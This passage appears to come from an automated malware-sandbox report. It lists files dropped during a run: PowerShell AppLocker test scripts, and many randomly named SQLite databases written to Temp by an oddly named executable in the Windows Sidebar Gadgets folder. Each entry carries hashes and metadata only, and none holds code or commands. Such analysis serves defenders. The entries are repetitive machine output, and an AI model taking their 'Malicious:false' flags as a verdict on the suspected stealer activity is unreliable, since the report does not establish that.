                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lubdixit.ble.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvvsvjpc.llx.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxvslrvl.0tq.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmrdqc2p.kz0.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qujpbzkd.2km.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzyo4q3q.v2i.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgsorcof.mnp.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnfzharf.lj4.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywzudj3m.mt2.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\a4Wq9Pqnkx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\a6lvMwDMBM

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aArNtxPJla

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aSxJPDuZPB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aXhx73Pxt8

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\abLbCOQ1dl

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aq2D0Nitpj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\b85G5gTiWI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bM8pxli0p7

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cF6qi8kMK6

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cqfbp03rZt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cvYRbw3xb3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\d2xbrqVTex

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
